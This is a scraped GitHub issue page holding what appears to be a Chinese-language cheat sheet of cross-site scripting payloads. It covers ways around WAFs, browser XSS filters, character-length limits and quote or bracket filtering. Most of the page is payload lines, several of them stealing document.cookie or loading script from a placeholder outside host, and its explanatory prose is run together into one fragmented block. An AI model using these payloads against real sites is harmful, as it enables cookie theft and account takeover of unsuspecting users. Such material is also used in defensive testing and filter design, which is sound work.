We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Satisfaction doesn't come from the outside, but from the inside.
WAF
XSS
HTML
JS
eval、document.write、innerHTML
<div id="x"> 可控的安全数据 </div> <limited_xss_point>alert(1);</limited_xss_point>
Payload
escape
<div id="x">alert%28document.cookie%29%3b</div> // escape编码 <limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
28 + len(id)
document.URL
<p>
<p class="comment" title=""><script>/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x=new Array();/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[0]='a';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[1]='l';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[2]='e';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[3]='r';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[4]='t';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[5]='(';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[6]='1';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[7]=')';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/y=x.join('');/*" data-comment='{"id":1}'></p> <p class="comment" title="*/eval(y);/*" data-comment='{"id":1}'></p> <p class="comment" title="*/</script>" data-comment='{"id":1}'></p>
URL
document.URL/location.href
http://www.xxx.com/1.php?x=1...&alert(document.cookie) // 假设代码从第80个字符开始 <limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
30
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
31
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
29
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
location
hash
#
http://www.xxx.com/1.php?x=1...#alert(document.cookie) <limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
1
function loads(url){ ... document.body.appendChild(script); }
<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
len(函数名)+len(url)+5
HTTP
function get(url){ ... return x.response Text; }
<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
len(函数名)+len(url)+11
document.referrer
referrer
http://www.a.com/attack.html?...&alert(document.cookie) <a href="http://www.xssedsite.com/xssed.php">go</a>
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
clipboardData
<script> clipboardData.setData("text", "alert(document.cookie)"); </script>
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
IE 7
window.name
name
<script> window.name = "alert(document.cookie)"; location.href = "http://www.xssedsitecom/xssedphp"; </script>
<limited_xss_point>eval(name);</limited_xss_point>
11
/
<script>alert(/1/)</script> <iframe/onload=alert(/1/)> <img src=x onerror=alert(/1/)> <p onmouseover=alert(/1/)>xxx</p>
String.fromCharCode
fromCharCode
eval
<script>alert('1')</alert> <script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script>
onerror
onmouseover
onload
<、>、=
script
<img src=x onerror=alert(/1/)> <p onmouseover=alert(/1/)>xxx</p> <frameset onload=alert(/1/)> <body onload=alert(/1/)>
style
expression
IE
<div style="width:expression(alert('1'));">
JavaScript
<img src=javascript:alert('1')>
Cookie
src
.js
<script src='1.js'></script>
hex
dec
<div style="width:expression(alert('1'))">1</div> <div style="width:expression(alert('1'))">1</div>
Filter
反射型XSS
IE Filter
<a href=>
a
sc%0aript
href
<a href="xss.php?a=<sc%0aript>alert(/1/)</script>">
utf7
UTF7-BOM
header
utf-7
%2BACIAPgA8-script%2BAD4-alert%28/1/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
Flash
www.b.com
iframe
www.a.com
Flash XSS
<iframe/src="http://www.b.com/1.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
Chrome
<iframe/src="http://www.b.com/1.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
Chrome Filter
data
?vuln=<a href="javascript:alert(document.cookie);">click</a> // 拦截 >vuln=<a href="javascript:void(0)">click</a> // 绕过 ?vuln=<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+ ">click<a> // 绕过
object
applet
base
link
meta
import
embed
vmlframe
isindex
form
textarea
javascript:
vbscript:
on*
<ifra<ifame>me>...</ifra</iframe>me> <s<script>cript>...</s</script>cript>
<div style="width:expression(alert(/1/))">1</div> <div style="width:\0065xpression(alert(/1/))">1</div> // 编码 <div style="width:\0065xpressio\6e(alert(/1/))">1</div> <div style="width:\0065xpression(alert(/1/))">1</div>
tab
换行
空白符
/**
<div style="width:exp/** **/ression(alert(/1/))">1</div>
date
base64
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=">
HTML5
button
video
audio
article
footer
nav
automplete
autofocus
pattern
<input onfocus=write(1) autofocus> <video poster=javascript:alert(1)//></video>
<!--[if IE]><img src=# width=0 height=0 onerror=alert(/ourren_demo/)><![endif]--> <comment><img src="</comment><img src=x onerror=alert(/ourren_demo/)//">
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 XSS
WAF绕过XSS字符数量限制绕过XSS漏洞由于字符数量限制导致没法有效利用,所以需要绕过限制HTML上下文中其他可控数据XSS漏洞的页面HTML上下文中还有其他可控数据,那么可以通过JS获取该数据,然后通过eval、document.write、innerHTML等方式执行该数据,从而突破XSS字符数量限制XSS处字符数量的限制,所以只能弹框,无法有效利用,这里通过把XSS的Payload通过escape编码后作为安全的数据,输出到可控的安全数据位置(此处未限制),然后在XSS处执行可控的安全数据28 + len(id)document.URL等方式,但是可控无限个<p>,可以分割单独插入URL中的数据HTML上下文,可以使用URL,URL中的数据是无条件可控的,通过在URL的尾部参数构造要执行的代码,然后在XSS处通过document.URL/location.href等方式获得代码数据执行30312930location对象 中hash成员可以获取#之后的数据#开头,所以从1开始,长度:29JS上下文JS上下文现有的这些函数来实现突破长度限制len(函数名)+len(url)+5HTTP请求len(函数名)+len(url)+11document.referrerXSS的页面,在自己域上的页面URL带入Payload,被XSS的页面通过referrer获取相关代码执行referrer参数,当攻击者的页面访问的时候,就会有referrer参数,即攻击者的URLXSS的页面clipboardDataclipboardData把Payload写入剪切板,然后在被XSS的页面获取并执行该数据XSS的页面IE 7以下window.namewindow.name直接设置当前窗口的name则没有特殊字符限制,然后直接跳转到被XSS的页面,通过name属性传递Payload过去执行XSS的页面11XSS引号绕过/进行绕过String.fromCharCodefromCharCode可以对利用代码中的引号进行编码处理,需要利用eval函数结合使用XSS尖括号绕过onerror、onmouseover、onload等(但是这里依然需要有<、>、=等符号,只能是在script才过滤)style与expressionstyle样式进行跨站(IE)JavaScript伪协议IEXSS括号绕过Cookie等,还需要传播(XSS蠕虫)src引入外部文件,利用代码写在外部文件中(外部文件后缀可以不为.js)hex、dec编码XSS绕过过滤器(Filter)反射型XSS,其他类型基本不受影响IE Filter绕过<a href=>反射型XSS,可以利用a标签和sc%0aript实现绕过,不过需要用户点击href里面的地址不同域就会产生过滤utf7UTF7-BOM实现,全补丁情况下只有当header里编码为utf-7才能成功Flashwww.b.com域名下用iframe嵌入www.a.com的Flash XSS文件,当受害者打开www.b.com,就可以触发www.a.com域名下的XSS,获取数据a而言,这个Flash XSS只是普通的Flash XSS,只不过是由跨域的浏览器发起的Chrome下可能会导致浏览器崩溃,改用以下代码Chrome Filterdata协议XSS富文本绕过objectappletbaselinkmetaimportembedvmlframeiframescriptstyleisindexformtextareajavascript:vbscript:onloadonerroron*expression只能IE执行,因此仅限于IEtab、换行、空白符、/**绕过关键字匹配,基本也只限于IEobject标签,将date属性数据进行base64编码绕过关键数据,同时object标签也是经常被遗忘的标签HTML5HTML5新标签或者新属性来进行绕过buttonvideoaudioarticlefooternavautompleteautofocuspattern...IE的注释方式The text was updated successfully, but these errors were encountered: